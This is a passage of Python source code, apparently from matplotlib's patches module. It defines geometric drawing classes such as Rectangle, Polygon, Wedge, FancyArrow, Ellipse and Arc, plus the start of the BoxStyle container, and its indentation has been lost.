The shift of the shadow in data coordinates, scaled by a factor
of dpi/72.
props : dict
*deprecated (use kwargs instead)* Properties of the shadow patch.
**kwargs
Properties of the shadow patch. Supported keys are:
%(Patch)s
"""
Patch.__init__(self)
self.patch = patch
# Note: when removing props, we can directly pass kwargs to _update()
# and remove self._props
if props is None:
color = .3 * np.asarray(colors.to_rgb(self.patch.get_facecolor()))
props = {
'facecolor': color,
'edgecolor': color,
'alpha': 0.5,
}
self._props = {**props, **kwargs}
self._ox, self._oy = ox, oy
self._shadow_transform = transforms.Affine2D()
self._update()
props = cbook._deprecate_privatize_attribute("3.3")
def _update(self):
self.update_from(self.patch)
# Place the shadow patch directly behind the inherited patch.
self.set_zorder(np.nextafter(self.patch.zorder, -np.inf))
self.update(self._props)
def _update_transform(self, renderer):
ox = renderer.points_to_pixels(self._ox)
oy = renderer.points_to_pixels(self._oy)
self._shadow_transform.clear().translate(ox, oy)
def _get_ox(self):
return self._ox
def _set_ox(self, ox):
self._ox = ox
def _get_oy(self):
return self._oy
def _set_oy(self, oy):
self._oy = oy
def get_path(self):
return self.patch.get_path()
def get_patch_transform(self):
return self.patch.get_patch_transform() + self._shadow_transform
def draw(self, renderer):
self._update_transform(renderer)
Patch.draw(self, renderer)
class Rectangle(Patch):
"""
A rectangle defined via an anchor point *xy* and its *width* and *height*.
The rectangle extends from ``xy[0]`` to ``xy[0] + width`` in x-direction
and from ``xy[1]`` to ``xy[1] + height`` in y-direction. ::
: +------------------+
: | |
: height |
: | |
: (xy)---- width -----+
One may picture *xy* as the bottom left corner, but which corner *xy* is
actually depends on the the direction of the axis and the sign of *width*
and *height*; e.g. *xy* would be the bottom right corner if the x-axis
was inverted or if *width* was negative.
"""
def __str__(self):
pars = self._x0, self._y0, self._width, self._height, self.angle
fmt = "Rectangle(xy=(%g, %g), width=%g, height=%g, angle=%g)"
return fmt % pars
@docstring.dedent_interpd
def __init__(self, xy, width, height, angle=0.0, **kwargs):
"""
Parameters
----------
xy : (float, float)
The anchor point.
width : float
Rectangle width.
height : float
Rectangle height.
angle : float, default: 0
Rotation in degrees anti-clockwise about *xy*.
Other Parameters
----------------
**kwargs : `.Patch` properties
%(Patch)s
"""
Patch.__init__(self, **kwargs)
self._x0 = xy[0]
self._y0 = xy[1]
self._width = width
self._height = height
self._x1 = self._x0 + self._width
self._y1 = self._y0 + self._height
self.angle = float(angle)
# Note: This cannot be calculated until this is added to an Axes
self._rect_transform = transforms.IdentityTransform()
def get_path(self):
"""Return the vertices of the rectangle."""
return Path.unit_rectangle()
def _update_patch_transform(self):
"""
Notes
-----
This cannot be called until after this has been added to an Axes,
otherwise unit conversion will fail. This makes it very important to
call the accessor method and not directly access the transformation
member variable.
"""
x0, y0, x1, y1 = self._convert_units()
bbox = transforms.Bbox.from_extents(x0, y0, x1, y1)
rot_trans = transforms.Affine2D()
rot_trans.rotate_deg_around(x0, y0, self.angle)
self._rect_transform = transforms.BboxTransformTo(bbox)
self._rect_transform += rot_trans
def _update_x1(self):
self._x1 = self._x0 + self._width
def _update_y1(self):
self._y1 = self._y0 + self._height
def _convert_units(self):
"""Convert bounds of the rectangle."""
x0 = self.convert_xunits(self._x0)
y0 = self.convert_yunits(self._y0)
x1 = self.convert_xunits(self._x1)
y1 = self.convert_yunits(self._y1)
return x0, y0, x1, y1
def get_patch_transform(self):
self._update_patch_transform()
return self._rect_transform
def get_x(self):
"""Return the left coordinate of the rectangle."""
return self._x0
def get_y(self):
"""Return the bottom coordinate of the rectangle."""
return self._y0
def get_xy(self):
"""Return the left and bottom coords of the rectangle as a tuple."""
return self._x0, self._y0
def get_width(self):
"""Return the width of the rectangle."""
return self._width
def get_height(self):
"""Return the height of the rectangle."""
return self._height
def set_x(self, x):
"""Set the left coordinate of the rectangle."""
self._x0 = x
self._update_x1()
self.stale = True
def set_y(self, y):
"""Set the bottom coordinate of the rectangle."""
self._y0 = y
self._update_y1()
self.stale = True
def set_xy(self, xy):
"""
Set the left and bottom coordinates of the rectangle.
Parameters
----------
xy : (float, float)
"""
self._x0, self._y0 = xy
self._update_x1()
self._update_y1()
self.stale = True
def set_width(self, w):
"""Set the width of the rectangle."""
self._width = w
self._update_x1()
self.stale = True
def set_height(self, h):
"""Set the height of the rectangle."""
self._height = h
self._update_y1()
self.stale = True
def set_bounds(self, *args):
"""
Set the bounds of the rectangle as *left*, *bottom*, *width*, *height*.
The values may be passed as separate parameters or as a tuple::
set_bounds(left, bottom, width, height)
set_bounds((left, bottom, width, height))
.. ACCEPTS: (left, bottom, width, height)
"""
if len(args) == 1:
l, b, w, h = args[0]
else:
l, b, w, h = args
self._x0 = l
self._y0 = b
self._width = w
self._height = h
self._update_x1()
self._update_y1()
self.stale = True
def get_bbox(self):
"""Return the `.Bbox`."""
x0, y0, x1, y1 = self._convert_units()
return transforms.Bbox.from_extents(x0, y0, x1, y1)
xy = property(get_xy, set_xy)
class RegularPolygon(Patch):
"""A regular polygon patch."""
def __str__(self):
s = "RegularPolygon((%g, %g), %d, radius=%g, orientation=%g)"
return s % (self._xy[0], self._xy[1], self._numVertices, self._radius,
self._orientation)
@docstring.dedent_interpd
def __init__(self, xy, numVertices, radius=5, orientation=0,
**kwargs):
"""
Parameters
----------
xy : (float, float)
The center position.
numVertices : int
The number of vertices.
radius : float
The distance from the center to each of the vertices.
orientation : float
The polygon rotation angle (in radians).
**kwargs
`Patch` properties:
%(Patch)s
"""
self._xy = xy
self._numVertices = numVertices
self._orientation = orientation
self._radius = radius
self._path = Path.unit_regular_polygon(numVertices)
self._poly_transform = transforms.Affine2D()
self._update_transform()
Patch.__init__(self, **kwargs)
def _update_transform(self):
self._poly_transform.clear() \
.scale(self.radius) \
.rotate(self.orientation) \
.translate(*self.xy)
@property
def xy(self):
return self._xy
@xy.setter
def xy(self, xy):
self._xy = xy
self._update_transform()
@property
def orientation(self):
return self._orientation
@orientation.setter
def orientation(self, orientation):
self._orientation = orientation
self._update_transform()
@property
def radius(self):
return self._radius
@radius.setter
def radius(self, radius):
self._radius = radius
self._update_transform()
@property
def numvertices(self):
return self._numVertices
@numvertices.setter
def numvertices(self, numVertices):
self._numVertices = numVertices
def get_path(self):
return self._path
def get_patch_transform(self):
self._update_transform()
return self._poly_transform
class PathPatch(Patch):
"""A general polycurve path patch."""
_edge_default = True
def __str__(self):
s = "PathPatch%d((%g, %g) ...)"
return s % (len(self._path.vertices), *tuple(self._path.vertices[0]))
@docstring.dedent_interpd
def __init__(self, path, **kwargs):
"""
*path* is a `~.path.Path` object.
Valid keyword arguments are:
%(Patch)s
"""
Patch.__init__(self, **kwargs)
self._path = path
def get_path(self):
return self._path
def set_path(self, path):
self._path = path
class Polygon(Patch):
"""A general polygon patch."""
def __str__(self):
s = "Polygon%d((%g, %g) ...)"
return s % (len(self._path.vertices), *tuple(self._path.vertices[0]))
@docstring.dedent_interpd
def __init__(self, xy, closed=True, **kwargs):
"""
*xy* is a numpy array with shape Nx2.
If *closed* is *True*, the polygon will be closed so the
starting and ending points are the same.
Valid keyword arguments are:
%(Patch)s
"""
Patch.__init__(self, **kwargs)
self._closed = closed
self.set_xy(xy)
def get_path(self):
"""Get the `.Path` of the polygon."""
return self._path
def get_closed(self):
"""Return whether the polygon is closed."""
return self._closed
def set_closed(self, closed):
"""
Set whether the polygon is closed.
Parameters
----------
closed : bool
True if the polygon is closed
"""
if self._closed == bool(closed):
return
self._closed = bool(closed)
self.set_xy(self.get_xy())
self.stale = True
def get_xy(self):
"""
Get the vertices of the path.
Returns
-------
(N, 2) numpy array
The coordinates of the vertices.
"""
return self._path.vertices
def set_xy(self, xy):
"""
Set the vertices of the polygon.
Parameters
----------
xy : (N, 2) array-like
The coordinates of the vertices.
Notes
-----
Unlike `~.path.Path`, we do not ignore the last input vertex. If the
polygon is meant to be closed, and the last point of the polygon is not
equal to the first, we assume that the user has not explicitly passed a
``CLOSEPOLY`` vertex, and add it ourselves.
"""
xy = np.asarray(xy)
nverts, _ = xy.shape
if self._closed:
# if the first and last vertex are the "same", then we assume that
# the user explicitly passed the CLOSEPOLY vertex. Otherwise, we
# have to append one since the last vertex will be "ignored" by
# Path
if nverts == 1 or nverts > 1 and (xy[0] != xy[-1]).any():
xy = np.concatenate([xy, [xy[0]]])
else:
# if we aren't closed, and the last vertex matches the first, then
# we assume we have an unecessary CLOSEPOLY vertex and remove it
if nverts > 2 and (xy[0] == xy[-1]).all():
xy = xy[:-1]
self._path = Path(xy, closed=self._closed)
self.stale = True
xy = property(get_xy, set_xy,
doc='The vertices of the path as (N, 2) numpy array.')
class Wedge(Patch):
"""Wedge shaped patch."""
def __str__(self):
pars = (self.center[0], self.center[1], self.r,
self.theta1, self.theta2, self.width)
fmt = "Wedge(center=(%g, %g), r=%g, theta1=%g, theta2=%g, width=%s)"
return fmt % pars
@docstring.dedent_interpd
def __init__(self, center, r, theta1, theta2, width=None, **kwargs):
"""
A wedge centered at *x*, *y* center with radius *r* that
sweeps *theta1* to *theta2* (in degrees). If *width* is given,
then a partial wedge is drawn from inner radius *r* - *width*
to outer radius *r*.
Valid keyword arguments are:
%(Patch)s
"""
Patch.__init__(self, **kwargs)
self.center = center
self.r, self.width = r, width
self.theta1, self.theta2 = theta1, theta2
self._patch_transform = transforms.IdentityTransform()
self._recompute_path()
def _recompute_path(self):
# Inner and outer rings are connected unless the annulus is complete
if abs((self.theta2 - self.theta1) - 360) <= 1e-12:
theta1, theta2 = 0, 360
connector = Path.MOVETO
else:
theta1, theta2 = self.theta1, self.theta2
connector = Path.LINETO
# Form the outer ring
arc = Path.arc(theta1, theta2)
if self.width is not None:
# Partial annulus needs to draw the outer ring
# followed by a reversed and scaled inner ring
v1 = arc.vertices
v2 = arc.vertices[::-1] * (self.r - self.width) / self.r
v = np.vstack([v1, v2, v1[0, :], (0, 0)])
c = np.hstack([arc.codes, arc.codes, connector, Path.CLOSEPOLY])
c[len(arc.codes)] = connector
else:
# Wedge doesn't need an inner ring
v = np.vstack([arc.vertices, [(0, 0), arc.vertices[0, :], (0, 0)]])
c = np.hstack([arc.codes, [connector, connector, Path.CLOSEPOLY]])
# Shift and scale the wedge to the final location.
v *= self.r
v += np.asarray(self.center)
self._path = Path(v, c)
def set_center(self, center):
self._path = None
self.center = center
self.stale = True
def set_radius(self, radius):
self._path = None
self.r = radius
self.stale = True
def set_theta1(self, theta1):
self._path = None
self.theta1 = theta1
self.stale = True
def set_theta2(self, theta2):
self._path = None
self.theta2 = theta2
self.stale = True
def set_width(self, width):
self._path = None
self.width = width
self.stale = True
def get_path(self):
if self._path is None:
self._recompute_path()
return self._path
# COVERAGE NOTE: Not used internally or from examples
class Arrow(Patch):
"""An arrow patch."""
def __str__(self):
return "Arrow()"
_path = Path([[0.0, 0.1], [0.0, -0.1],
[0.8, -0.1], [0.8, -0.3],
[1.0, 0.0], [0.8, 0.3],
[0.8, 0.1], [0.0, 0.1]],
closed=True)
@docstring.dedent_interpd
def __init__(self, x, y, dx, dy, width=1.0, **kwargs):
"""
Draws an arrow from (*x*, *y*) to (*x* + *dx*, *y* + *dy*).
The width of the arrow is scaled by *width*.
Parameters
----------
x : float
x coordinate of the arrow tail.
y : float
y coordinate of the arrow tail.
dx : float
Arrow length in the x direction.
dy : float
Arrow length in the y direction.
width : float, default: 1
Scale factor for the width of the arrow. With a default value of 1,
the tail width is 0.2 and head width is 0.6.
**kwargs
Keyword arguments control the `Patch` properties:
%(Patch)s
See Also
--------
FancyArrow
Patch that allows independent control of the head and tail
properties.
"""
super().__init__(**kwargs)
self._patch_transform = (
transforms.Affine2D()
.scale(np.hypot(dx, dy), width)
.rotate(np.arctan2(dy, dx))
.translate(x, y)
.frozen())
def get_path(self):
return self._path
def get_patch_transform(self):
return self._patch_transform
class FancyArrow(Polygon):
"""
Like Arrow, but lets you set head width and head height independently.
"""
_edge_default = True
def __str__(self):
return "FancyArrow()"
@docstring.dedent_interpd
def __init__(self, x, y, dx, dy, width=0.001, length_includes_head=False,
head_width=None, head_length=None, shape='full', overhang=0,
head_starts_at_zero=False, **kwargs):
"""
Parameters
----------
width: float, default: 0.001
Width of full arrow tail.
length_includes_head: bool, default: False
True if head is to be counted in calculating the length.
head_width: float or None, default: 3*width
Total width of the full arrow head.
head_length: float or None, default: 1.5*head_width
Length of arrow head.
shape: ['full', 'left', 'right'], default: 'full'
Draw the left-half, right-half, or full arrow.
overhang: float, default: 0
Fraction that the arrow is swept back (0 overhang means
triangular shape). Can be negative or greater than one.
head_starts_at_zero: bool, default: False
If True, the head starts being drawn at coordinate 0
instead of ending at coordinate 0.
**kwargs
`.Patch` properties:
%(Patch)s
"""
if head_width is None:
head_width = 3 * width
if head_length is None:
head_length = 1.5 * head_width
distance = np.hypot(dx, dy)
if length_includes_head:
length = distance
else:
length = distance + head_length
if not length:
verts = np.empty([0, 2]) # display nothing if empty
else:
# start by drawing horizontal arrow, point at (0, 0)
hw, hl, hs, lw = head_width, head_length, overhang, width
left_half_arrow = np.array([
[0.0, 0.0], # tip
[-hl, -hw / 2], # leftmost
[-hl * (1 - hs), -lw / 2], # meets stem
[-length, -lw / 2], # bottom left
[-length, 0],
])
# if we're not including the head, shift up by head length
if not length_includes_head:
left_half_arrow += [head_length, 0]
# if the head starts at 0, shift up by another head length
if head_starts_at_zero:
left_half_arrow += [head_length / 2, 0]
# figure out the shape, and complete accordingly
if shape == 'left':
coords = left_half_arrow
else:
right_half_arrow = left_half_arrow * [1, -1]
if shape == 'right':
coords = right_half_arrow
elif shape == 'full':
# The half-arrows contain the midpoint of the stem,
# which we can omit from the full arrow. Including it
# twice caused a problem with xpdf.
coords = np.concatenate([left_half_arrow[:-1],
right_half_arrow[-2::-1]])
else:
raise ValueError("Got unknown shape: %s" % shape)
if distance != 0:
cx = dx / distance
sx = dy / distance
else:
# Account for division by zero
cx, sx = 0, 1
M = [[cx, sx], [-sx, cx]]
verts = np.dot(coords, M) + (x + dx, y + dy)
super().__init__(verts, closed=True, **kwargs)
docstring.interpd.update(
FancyArrow="\n".join(inspect.getdoc(FancyArrow.__init__).splitlines()[2:]))
class CirclePolygon(RegularPolygon):
"""A polygon-approximation of a circle patch."""
def __str__(self):
s = "CirclePolygon((%g, %g), radius=%g, resolution=%d)"
return s % (self._xy[0], self._xy[1], self._radius, self._numVertices)
@docstring.dedent_interpd
def __init__(self, xy, radius=5,
resolution=20, # the number of vertices
** kwargs):
"""
Create a circle at *xy* = (*x*, *y*) with given *radius*.
This circle is approximated by a regular polygon with *resolution*
sides. For a smoother circle drawn with splines, see `Circle`.
Valid keyword arguments are:
%(Patch)s
"""
RegularPolygon.__init__(self, xy,
resolution,
radius,
orientation=0,
**kwargs)
class Ellipse(Patch):
"""A scale-free ellipse."""
def __str__(self):
pars = (self._center[0], self._center[1],
self.width, self.height, self.angle)
fmt = "Ellipse(xy=(%s, %s), width=%s, height=%s, angle=%s)"
return fmt % pars
@docstring.dedent_interpd
def __init__(self, xy, width, height, angle=0, **kwargs):
"""
Parameters
----------
xy : (float, float)
xy coordinates of ellipse centre.
width : float
Total length (diameter) of horizontal axis.
height : float
Total length (diameter) of vertical axis.
angle : float, default: 0
Rotation in degrees anti-clockwise.
Notes
-----
Valid keyword arguments are:
%(Patch)s
"""
Patch.__init__(self, **kwargs)
self._center = xy
self._width, self._height = width, height
self._angle = angle
self._path = Path.unit_circle()
# Note: This cannot be calculated until this is added to an Axes
self._patch_transform = transforms.IdentityTransform()
def _recompute_transform(self):
"""
Notes
-----
This cannot be called until after this has been added to an Axes,
otherwise unit conversion will fail. This makes it very important to
call the accessor method and not directly access the transformation
member variable.
"""
center = (self.convert_xunits(self._center[0]),
self.convert_yunits(self._center[1]))
width = self.convert_xunits(self._width)
height = self.convert_yunits(self._height)
self._patch_transform = transforms.Affine2D() \
.scale(width * 0.5, height * 0.5) \
.rotate_deg(self.angle) \
.translate(*center)
def get_path(self):
"""Return the path of the ellipse."""
return self._path
def get_patch_transform(self):
self._recompute_transform()
return self._patch_transform
def set_center(self, xy):
"""
Set the center of the ellipse.
Parameters
----------
xy : (float, float)
"""
self._center = xy
self.stale = True
def get_center(self):
"""Return the center of the ellipse."""
return self._center
center = property(get_center, set_center)
def set_width(self, width):
"""
Set the width of the ellipse.
Parameters
----------
width : float
"""
self._width = width
self.stale = True
def get_width(self):
"""
Return the width of the ellipse.
"""
return self._width
width = property(get_width, set_width)
def set_height(self, height):
"""
Set the height of the ellipse.
Parameters
----------
height : float
"""
self._height = height
self.stale = True
def get_height(self):
"""Return the height of the ellipse."""
return self._height
height = property(get_height, set_height)
def set_angle(self, angle):
"""
Set the angle of the ellipse.
Parameters
----------
angle : float
"""
self._angle = angle
self.stale = True
def get_angle(self):
"""Return the angle of the ellipse."""
return self._angle
angle = property(get_angle, set_angle)
class Circle(Ellipse):
"""A circle patch."""
def __str__(self):
pars = self.center[0], self.center[1], self.radius
fmt = "Circle(xy=(%g, %g), radius=%g)"
return fmt % pars
@docstring.dedent_interpd
def __init__(self, xy, radius=5, **kwargs):
"""
Create a true circle at center *xy* = (*x*, *y*) with given *radius*.
Unlike `CirclePolygon` which is a polygonal approximation, this uses
Bezier splines and is much closer to a scale-free circle.
Valid keyword arguments are:
%(Patch)s
"""
Ellipse.__init__(self, xy, radius * 2, radius * 2, **kwargs)
self.radius = radius
def set_radius(self, radius):
"""
Set the radius of the circle.
Parameters
----------
radius : float
"""
self.width = self.height = 2 * radius
self.stale = True
def get_radius(self):
"""Return the radius of the circle."""
return self.width / 2.
radius = property(get_radius, set_radius)
class Arc(Ellipse):
"""
An elliptical arc, i.e. a segment of an ellipse.
Due to internal optimizations, there are certain restrictions on using Arc:
- The arc cannot be filled.
- The arc must be used in an `~.axes.Axes` instance. It can not be added
directly to a `.Figure` because it is optimized to only render the
segments that are inside the axes bounding box with high resolution.
"""
def __str__(self):
pars = (self.center[0], self.center[1], self.width,
self.height, self.angle, self.theta1, self.theta2)
fmt = ("Arc(xy=(%g, %g), width=%g, "
"height=%g, angle=%g, theta1=%g, theta2=%g)")
return fmt % pars
@docstring.dedent_interpd
def __init__(self, xy, width, height, angle=0.0,
theta1=0.0, theta2=360.0, **kwargs):
"""
Parameters
----------
xy : (float, float)
The center of the ellipse.
width : float
The length of the horizontal axis.
height : float
The length of the vertical axis.
angle : float
Rotation of the ellipse in degrees (counterclockwise).
theta1, theta2 : float, default: 0, 360
Starting and ending angles of the arc in degrees. These values
are relative to *angle*, e.g. if *angle* = 45 and *theta1* = 90
the absolute starting angle is 135.
Default *theta1* = 0, *theta2* = 360, i.e. a complete ellipse.
The arc is drawn in the counterclockwise direction.
Angles greater than or equal to 360, or smaller than 0, are
represented by an equivalent angle in the range [0, 360), by
taking the input value mod 360.
Other Parameters
----------------
**kwargs : `.Patch` properties
Most `.Patch` properties are supported as keyword arguments,
with the exception of *fill* and *facecolor* because filling is
not supported.
%(Patch)s
"""
fill = kwargs.setdefault('fill', False)
if fill:
raise ValueError("Arc objects can not be filled")
Ellipse.__init__(self, xy, width, height, angle, **kwargs)
self.theta1 = theta1
self.theta2 = theta2
@artist.allow_rasterization
def draw(self, renderer):
"""
Draw the arc to the given *renderer*.
Notes
-----
Ellipses are normally drawn using an approximation that uses
eight cubic Bezier splines. The error of this approximation
is 1.89818e-6, according to this unverified source:
Lancaster, Don. *Approximating a Circle or an Ellipse Using
Four Bezier Cubic Splines.*
https://www.tinaja.com/glib/ellipse4.pdf
There is a use case where very large ellipses must be drawn
with very high accuracy, and it is too expensive to render the
entire ellipse with enough segments (either splines or line
segments). Therefore, in the case where either radius of the
ellipse is large enough that the error of the spline
approximation will be visible (greater than one pixel offset
from the ideal), a different technique is used.
In that case, only the visible parts of the ellipse are drawn,
with each visible arc using a fixed number of spline segments
(8). The algorithm proceeds as follows:
1. The points where the ellipse intersects the axes bounding
box are located. (This is done be performing an inverse
transformation on the axes bbox such that it is relative
to the unit circle -- this makes the intersection
calculation much easier than doing rotated ellipse
intersection directly).
This uses the "line intersecting a circle" algorithm from:
Vince, John. *Geometry for Computer Graphics: Formulae,
Examples & Proofs.* London: Springer-Verlag, 2005.
2. The angles of each of the intersection points are calculated.
3. Proceeding counterclockwise starting in the positive
x-direction, each of the visible arc-segments between the
pairs of vertices are drawn using the Bezier arc
approximation technique implemented in `.Path.arc`.
"""
if not hasattr(self, 'axes'):
raise RuntimeError('Arcs can only be used in Axes instances')
if not self.get_visible():
return
self._recompute_transform()
width = self.convert_xunits(self.width)
height = self.convert_yunits(self.height)
# If the width and height of ellipse are not equal, take into account
# stretching when calculating angles to draw between
def theta_stretch(theta, scale):
theta = np.deg2rad(theta)
x = np.cos(theta)
y = np.sin(theta)
stheta = np.rad2deg(np.arctan2(scale * y, x))
# arctan2 has the range [-pi, pi], we expect [0, 2*pi]
return (stheta + 360) % 360
theta1 = self.theta1
theta2 = self.theta2
if (
# if we need to stretch the angles because we are distorted
width != height
# and we are not doing a full circle.
#
# 0 and 360 do not exactly round-trip through the angle
# stretching (due to both float precision limitations and
# the difference between the range of arctan2 [-pi, pi] and
# this method [0, 360]) so avoid doing it if we don't have to.
and not (theta1 != theta2 and theta1 % 360 == theta2 % 360)
):
theta1 = theta_stretch(self.theta1, width / height)
theta2 = theta_stretch(self.theta2, width / height)
# Get width and height in pixels we need to use
# `self.get_data_transform` rather than `self.get_transform`
# because we want the transform from dataspace to the
# screen space to estimate how big the arc will be in physical
# units when rendered (the transform that we get via
# `self.get_transform()` goes from an idealized unit-radius
# space to screen space).
data_to_screen_trans = self.get_data_transform()
pwidth, pheight = (data_to_screen_trans.transform((width, height)) -
data_to_screen_trans.transform((0, 0)))
inv_error = (1.0 / 1.89818e-6) * 0.5
if pwidth < inv_error and pheight < inv_error:
self._path = Path.arc(theta1, theta2)
return Patch.draw(self, renderer)
def line_circle_intersect(x0, y0, x1, y1):
dx = x1 - x0
dy = y1 - y0
dr2 = dx * dx + dy * dy
D = x0 * y1 - x1 * y0
D2 = D * D
discrim = dr2 - D2
if discrim >= 0.0:
sign_dy = np.copysign(1, dy) # +/-1, never 0.
sqrt_discrim = np.sqrt(discrim)
return np.array(
[[(D * dy + sign_dy * dx * sqrt_discrim) / dr2,
(-D * dx + abs(dy) * sqrt_discrim) / dr2],
[(D * dy - sign_dy * dx * sqrt_discrim) / dr2,
(-D * dx - abs(dy) * sqrt_discrim) / dr2]])
else:
return np.empty((0, 2))
def segment_circle_intersect(x0, y0, x1, y1):
epsilon = 1e-9
if x1 < x0:
x0e, x1e = x1, x0
else:
x0e, x1e = x0, x1
if y1 < y0:
y0e, y1e = y1, y0
else:
y0e, y1e = y0, y1
xys = line_circle_intersect(x0, y0, x1, y1)
xs, ys = xys.T
return xys[
(x0e - epsilon < xs) & (xs < x1e + epsilon)
& (y0e - epsilon < ys) & (ys < y1e + epsilon)
]
# Transforms the axes box_path so that it is relative to the unit
# circle in the same way that it is relative to the desired ellipse.
box_path_transform = (transforms.BboxTransformTo(self.axes.bbox)
+ self.get_transform().inverted())
box_path = Path.unit_rectangle().transformed(box_path_transform)
thetas = set()
# For each of the point pairs, there is a line segment
for p0, p1 in zip(box_path.vertices[:-1], box_path.vertices[1:]):
xy = segment_circle_intersect(*p0, *p1)
x, y = xy.T
# arctan2 return [-pi, pi), the rest of our angles are in
# [0, 360], adjust as needed.
theta = (np.rad2deg(np.arctan2(y, x)) + 360) % 360
thetas.update(theta[(theta1 < theta) & (theta < theta2)])
thetas = sorted(thetas) + [theta2]
last_theta = theta1
theta1_rad = np.deg2rad(theta1)
inside = box_path.contains_point(
(np.cos(theta1_rad), np.sin(theta1_rad))
)
# save original path
path_original = self._path
for theta in thetas:
if inside:
self._path = Path.arc(last_theta, theta, 8)
Patch.draw(self, renderer)
inside = False
else:
inside = True
last_theta = theta
# restore original path
self._path = path_original
def bbox_artist(artist, renderer, props=None, fill=True):
"""
A debug function to draw a rectangle around the bounding
box returned by an artist's `.Artist.get_window_extent`
to test whether the artist is returning the correct bbox.
*props* is a dict of rectangle props with the additional property
'pad' that sets the padding around the bbox in points.
"""
if props is None:
props = {}
props = props.copy() # don't want to alter the pad externally
pad = props.pop('pad', 4)
pad = renderer.points_to_pixels(pad)
bbox = artist.get_window_extent(renderer)
r = Rectangle(
xy=(bbox.x0 - pad / 2, bbox.y0 - pad / 2),
width=bbox.width + pad, height=bbox.height + pad,
fill=fill, transform=transforms.IdentityTransform(), clip_on=False)
r.update(props)
r.draw(renderer)
def draw_bbox(bbox, renderer, color='k', trans=None):
"""
A debug function to draw a rectangle around the bounding
box returned by an artist's `.Artist.get_window_extent`
to test whether the artist is returning the correct bbox.
"""
r = Rectangle(xy=(bbox.x0, bbox.y0), width=bbox.width, height=bbox.height,
edgecolor=color, fill=False, clip_on=False)
if trans is not None:
r.set_transform(trans)
r.draw(renderer)
def _simpleprint_styles(_styles):
"""
A helper function for the _Style class. Given the dictionary of
{stylename: styleclass}, return a string rep of the list of keys.
Used to update the documentation.
"""
return "[{}]".format("|".join(map(" '{}' ".format, sorted(_styles))))
class _Style:
"""
A base class for the Styles. It is meant to be a container class,
where actual styles are declared as subclass of it, and it
provides some helper functions.
"""
def __new__(cls, stylename, **kw):
"""Return the instance of the subclass with the given style name."""
# The "class" should have the _style_list attribute, which is a mapping
# of style names to style classes.
_list = stylename.replace(" ", "").split(",")
_name = _list[0].lower()
try:
_cls = cls._style_list[_name]
except KeyError as err:
raise ValueError("Unknown style : %s" % stylename) from err
try:
_args_pair = [cs.split("=") for cs in _list[1:]]
_args = {k: float(v) for k, v in _args_pair}
except ValueError as err:
raise ValueError("Incorrect style argument : %s" %
stylename) from err
_args.update(kw)
return _cls(**_args)
@classmethod
def get_styles(cls):
"""Return a dictionary of available styles."""
return cls._style_list
@classmethod
def pprint_styles(cls):
"""Return the available styles as pretty-printed string."""
table = [('Class', 'Name', 'Attrs'),
*[(cls.__name__,
# Add backquotes, as - and | have special meaning in reST.
f'``{name}``',
# [1:-1] drops the surrounding parentheses.
str(inspect.signature(cls))[1:-1] or 'None')
for name, cls in sorted(cls._style_list.items())]]
# Convert to rst table.
col_len = [max(len(cell) for cell in column) for column in zip(*table)]
table_formatstr = ' '.join('=' * cl for cl in col_len)
rst_table = '\n'.join([
'',
table_formatstr,
' '.join(cell.ljust(cl) for cell, cl in zip(table[0], col_len)),
table_formatstr,
*[' '.join(cell.ljust(cl) for cell, cl in zip(row, col_len))
for row in table[1:]],
table_formatstr,
'',
])
return textwrap.indent(rst_table, prefix=' ' * 2)
@classmethod
def register(cls, name, style):
"""Register a new style."""
if not issubclass(style, cls._Base):
raise ValueError("%s must be a subclass of %s" % (style,
cls._Base))
cls._style_list[name] = style
def _register_style(style_list, cls=None, *, name=None):
"""Class decorator that stashes a class in a (style) dictionary."""
if cls is None:
return functools.partial(_register_style, style_list, name=name)
style_list[name or cls.__name__.lower()] = cls
return cls
class BoxStyle(_Style):
"""
`BoxStyle` is a container class which defines several
boxstyle classes, which are used for `FancyBboxPatch`.
A style object can be created as::
BoxStyle.Round(pad=0.2)
or::
BoxStyle("Round", pad=0.2)
or::
BoxStyle("Round, pad=0.2")
The following boxstyle classes are defined.
%(AvailableBoxstyles)s
An instance of any boxstyle class is an callable object,
whose call signature is::
__call__(self, x0, y0, width, height, mutation_size, aspect_ratio=1.)
and returns a `.Path` instance. *x0*, *y0*, *width* and
*height* specify the location and size of the box to be
drawn. *mutation_scale* determines the overall size of the
mutation (by which I mean the transformation of the rectangle to
the fancy box). *mutation_aspect* determines the aspect-ratio of
the mutation.
"""
_style_list = {}
class _Base:
"""
Abstract base class for styling of `.FancyBboxPatch`.
This class is not an artist itself. The `__call__` method returns the
`~matplotlib.path.Path` for outlining the fancy box. The actual drawing
is handled in `.FancyBboxPatch`.
Subclasses may only use parameters with default values in their
``__init__`` method because they must be able to be initialized
without arguments.
Subclasses must implement the `transmute` method. It receives the
enclosing rectangle *x0, y0, width, height* as well as the
*mutation_size*, which scales the outline properties such as padding.
It returns the outline of the fancy box as `.path.Path`.
"""
def transmute(self, x0, y0, width, height, mutation_size):
"""Return the `~.path.Path` outlining the given rectangle."""
raise NotImplementedError('Derived must override')
def __call__(self, x0, y0, width, height, mutation_size,
aspect_ratio=1.):
"""
Given the location and size of the box, return the path of
the box around it.
Parameters
----------
x0, y0, width, height : float
Location and size of the box.
mutation_size : float
A reference scale for the mutation.
aspect_ratio : float, default: 1
Aspect-ratio for the mutation.
Returns
-------
`~matplotlib.path.Path`
"""
# The __call__ method is a thin wrapper around the transmute method
# and takes care of the aspect.
if aspect_ratio is not None:
# Squeeze the given height by the aspect_ratio
y0, height = y0 / aspect_ratio, height / aspect_ratio
# call transmute method with squeezed height.
path = self.transmute(x0, y0, width, height, mutation_size)
vertices, codes = path.vertices, path.codes
# Restore the height
vertices[:, 1] = vertices[:, 1] * aspect_ratio
return Path(vertices, codes)
else:
return self.transmute(x0, y0, width, height, mutation_size)
@_register_style(_style_list)
class Square(_Base):
"""
A square box.
Parameters
----------
pad : float, default: 0.3
The amount of padding around the original box.
"""
def __init__(self, pad=0.3):
self.pad = pad
super().__init__()
def transmute(self, x0, y0, width, height, mutation_size):
pad = mutation_size * self.pad
# width and height with padding added.
width, height = width + 2 * pad, height + 2 * pad
# boundary of the padded box
x0, y0 = x0 - pad, y0 - pad
x1, y1 = x0 + width, y0 + height
return Path([(x0, y0), (x1, y0), (x1, y1), (x0, y1), (x0, y0)],
closed=True)
@_register_style(_style_list)
class Circle(_Base):
"""
A circular box.
Parameters
----------
pad : float, default: 0.3
The amount of padding around the original box.
"""
def __init__(self, pad=0.3):
self.pad = pad
super().__init__()
def transmute(self, x0, y0, width, height, mutation_size):
pad = mutation_size * self.pad
width, height = width + 2 * pad, height + 2 * pad
# boundary of the padded box
